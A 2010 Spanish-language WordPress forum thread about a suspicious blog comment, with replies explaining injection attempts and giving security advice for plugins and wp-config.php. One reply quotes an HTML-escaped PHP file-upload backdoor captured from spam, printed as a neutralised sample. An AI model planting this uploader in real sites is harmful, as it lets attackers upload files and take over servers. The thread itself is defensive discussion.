Foros del Web » Creando para Internet » Sistemas de gestión de contenidos » WordPress »

Comentario raro - ¿Exploit?

Estas en el tema de Comentario raro - ¿Exploit? en el foro de WordPress en Foros del Web. Recibí este "comentario" en un blog que tengo, me dijeron que se trata de un exploit o algo así, y algo había oído del tema, ...
  #1 (permalink)  
Antiguo 21/07/2010, 14:44
 
Fecha de Ingreso: abril-2003
Mensajes: 1.129
Antigüedad: 21 años, 8 meses
Puntos: 34
Comentario raro - ¿Exploit?

Recibí este "comentario" en un blog que tengo, me dijeron que se trata de un exploit o algo así, y algo había oído del tema, pero nunca me había llegado uno.

Lo que quiera saber es si tengo forma de saber si este logró algo o no.

__________________
elGastronomo
  #2 (permalink)  
Antiguo 22/07/2010, 09:01
AlvaroG
Invitado
 
Mensajes: n/a
Puntos:
Respuesta: Comentario raro - ¿Exploit?

Seguramente intentó aprovecharse de algún fallo de validación de código, solamente es javascript para colocar un 'banner' externo en tu página. Si ves el código quiere decir que las etiquetas no fueron analizadas y que wordpress no permitió que se ejecutara. Todo tranquilo (en principio al menos)
  #3 (permalink)  
Antiguo 22/07/2010, 13:00
 
Fecha de Ingreso: abril-2003
Mensajes: 1.129
Antigüedad: 21 años, 8 meses
Puntos: 34
Respuesta: Comentario raro - ¿Exploit?

Cita:
Iniciado por AlvaroG Ver Mensaje
Seguramente intentó aprovecharse de algún fallo de validación de código, solamente es javascript para colocar un 'banner' externo en tu página. Si ves el código quiere decir que las etiquetas no fueron analizadas y que wordpress no permitió que se ejecutara. Todo tranquilo (en principio al menos)
Okos, gracias. Ya puse también un antibots que tengo en otro sitio a ver si dejo de recibir comentarios spam.

Gracias.
__________________
elGastronomo
  #4 (permalink)  
Antiguo 23/07/2010, 06:41
Avatar de metacortex
Viejo demente
 
Fecha de Ingreso: junio-2004
Ubicación: Caracas - Venezuela
Mensajes: 9.027
Antigüedad: 20 años, 6 meses
Puntos: 832
Respuesta: Comentario raro - ¿Exploit?

Efectivamente se trata de un intento por ejecutar un sql injetion mediante el formulario de comentarios. Aparentemente se trata de una acción estúpida porque ciertos caracteres son convertidos a entidades html antes de ingresar a la BD. Wordpress lo tiene configurado de esa manera de forma nativa. Aquí una muestra de exploit previamente pasado por el filtro mencionado (lo tomé de un comentario enviado a mi blog):

Código PHP:
Ver original
  1. &lt;?php if (isset($_REQUEST[&quot;upload&quot;])) { $file=$HTTP_POST_FILES[&quot;file&quot;][&quot;name&quot;]; $path=realpath('.'); @move_uploaded_file($HTTP_POST_FILES[&quot;file&quot;][&quot;tmp_name&quot;], $path . &quot;/&quot; . $file) or die(); echo &quot;door uploaded&quot;; } else { echo &quot;<b>file uploader</b>"; } ?&gt;
Como pueden notar se trata de un código completa y oportunamente inutilizado debido a la conversión de caracteres.

Sin embargo, actualmente están surgiendo un montón de plugins que gestionan comentarios. Puede que algunos de ellos carezcan de las medidas de seguridad apropiadas. En mi opinión estos agresores no van tras Wordpress en sí, sino tras algún plugin.

Mi sugerencia es que traten en lo posible de verificar la seguridad del código de los plugins que utilizan, especialmente si tienen plugins que intervienen en funciones importantes del sistema, o si emplean formularios.

Algunos tips para verificar:

1.- El ingreso de datos debe efectuarse con la función mysql_real_escape_string.

2.- Los campos de formulario deben estar resguardado con nonce fields y además debe existir la condicional de chequeo de éstos antes de enviar los datos.

3.- La función debe poseer un método de chequeo y validación de referers para asegurarse de que el formulario no se ejecutará desde un servidor externo o zona ajena a la página donde se encuentra el formulario.

Si el plugin no sigue estos procedimientos básicos de seguridad, sencillamente estarán arriesgando su sitio a ataques.


Ahora tres acciones recomendadas a nivel nativo de Wordpress:

1.- Usar Askimet.

2.- Si el sitio web no tiene un alto flujo diario de comentarios recomiendo pre-moderarlos, es decir, que en lugar de pulbicarse inmediatamente vayan a la cola de moderación.

3.- El archivo wp-config.php (ubicado en la raiz de su directorio) tiene estas 4 líneas:

Código PHP:
Ver original
  1. define('AUTH_KEY', 'pon aquí tu frase aleatoria'); // Cambia esto por tu frase aleatoria.
  2. define('SECURE_AUTH_KEY', 'pon aquí tu frase aleatoria'); // Cambia esto por tu frase aleatoria.
  3. define('LOGGED_IN_KEY', 'pon aquí tu frase aleatoria'); // Cambia esto por tu frase aleatoria.
  4. define('NONCE_KEY', 'pon aquí tu frase aleatoria'); // Cambia esto por tu frase aleatoria.
Tal como se repite 8 veces ahí, supongo que queda entendido que hay que cambiar esas frases por una frase aleatoria. El motivo: el sistema codifica y compara las frases ingresadas allí para diversos fines, todos altamente críticos. Para saber cómo proceder hagan esto.

¿Han leido tópicos -en éste y otros foros- donde el usuario lloriquea porque le hackearon el sitio? pues 99 de cada 100 casos se deben a que de una u otra forma debilitaron la seguridad del sistema.

Entonces mis hijos, cada quien a cuidar su negocio porque sino viene el coco y se lo lleva.
  #5 (permalink)  
Antiguo 23/07/2010, 07:06
Avatar de Malenko
Moderador
 
Fecha de Ingreso: enero-2008
Mensajes: 5.323
Antigüedad: 16 años, 11 meses
Puntos: 606
Respuesta: Comentario raro - ¿Exploit?

A nivel de wordpress ya aplico tus dos primeros consejos pero la frase aleatoria no la conocía. También muy buenos los consejos a la hora de programar plugins para no perder seguridad.

Un comentario que espero reciba todo el karma que se merece :)
__________________
Aviso: No se resuelven dudas por MP!
  #6 (permalink)  
Antiguo 23/07/2010, 09:34
Avatar de isaac_ben  
Fecha de Ingreso: abril-2010
Ubicación: México
Mensajes: 266
Antigüedad: 14 años, 8 meses
Puntos: 18
Respuesta: Comentario raro - ¿Exploit?

Qué buenos consejos, metacortex.

Creo que lo mejor es utilizar los menos plug-ins posibles, por estas razones.

Saludos.
  #7 (permalink)  
Antiguo 23/07/2010, 16:08
 
Fecha de Ingreso: abril-2003
Mensajes: 1.129
Antigüedad: 21 años, 8 meses
Puntos: 34
Respuesta: Comentario raro - ¿Exploit?

Metacortex, ¡¡¡Genial Explicación!!! La verdad que queda muy claro todo. Entre Alvaro y tú, no sólo me han aclarado el tema, sino que me han aclarado también que camino seguir para aumentar la seguridad.

Lo del wp-config.php de poner esas frases aleatorias, si bien lo hago, a veces alguno en alguna instalación rápida de un WP quizás olvida ese paso, y si realmente es tan importante, creo que WP debería considerar mejorar su interfaz de instalación y brindarnos la posibilidad de que eso se realice de forma automática durante la instalación, cómo dice WP "Eso es todo, esperabas más, sentimos descepcionarte" (O algo similar) siempre dicen que instalas el WP en 2 segundos, pero nunca dicen que tenes que hacer varias cosas a mano, como la correcta configuración del wp-config.php y la creación de la carpeta uploads, son sólo algunas de las cosas que recuerdo ahora.

Lo del Akismet, volveré a instalarlo, debo reconocer que era el primer plugin que borraba de mi WP junto con el "Hello Dolly"

Bueno, miren en lo que se ha convertido el tema (no hay smile lindo)

Nuevamente, agradecerles las explicaciones
__________________
elGastronomo

Etiquetas: exploit, seguridad
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 09:23.